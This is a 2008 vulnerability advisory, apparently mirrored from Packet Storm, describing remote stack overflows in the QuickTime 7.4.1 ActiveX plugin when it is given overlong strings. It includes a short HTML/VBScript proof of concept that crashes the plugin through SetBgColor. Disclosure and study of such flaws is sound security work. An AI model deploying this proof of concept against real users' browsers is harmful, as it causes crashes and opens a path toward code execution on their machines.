Lucene search

aquick-overflow.txt

🗓️ 13 Feb 2008 00:00:00Reported by laurent gaffieType

packetstorm🔗 packetstormsecurity.com👁 16 Views

QuickTime 7.4.1 OCX Remote Stack Overflow in Window

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`Application: QuickTime <= 7.4.1 QTPlugin.ocx Multiple Remote Stack Overflow  
  
Web Site: http://www.apple.com/fr/quicktime/download/  
  
Platform: Windows  
  
Bug: Multiple Remote Stack Overflow  
  
-------------------------------------------------------  
  
1) Introduction  
  
2) Bug  
  
3) Proof of concept  
  
4) Credits  
  
===========  
  
1) Introduction  
  
===========  
  
A nice introduction to Quicktime Player can be found here : http://www.apple.com/quicktime/player/  
  
======  
  
2) Bug  
  
======  
  
Stack Overflow/Denial of service occurs when supplying a long string to theses functions:  
  
-SetBgColor  
-SetHREF  
-SetMovieName  
-SetTarget  
-SetMatrix  
  
=====  
  
3)Proof of concept  
  
=====  
  
Proof of concept example [works with the others functions supplyed in section 2) ] :  
<html>  
<object classid='clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B' id='foo' ></object>  
<input type="button" value="Hit me" language="VBScript" OnClick="test()">  
<script language="VBScript">  
sub test()  
bar = String(515305, "A")  
foo.SetBgColor bar  
End Sub  
</script>  
</html>  
  
=====  
  
5)Credits  
  
=====  
  
laurent gaffié  
  
laurent.gaffie{remove_this}[at]gmail[dot]com  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

13 Feb 2008 00:00Current

7.4High risk

Vulners AI Score7.4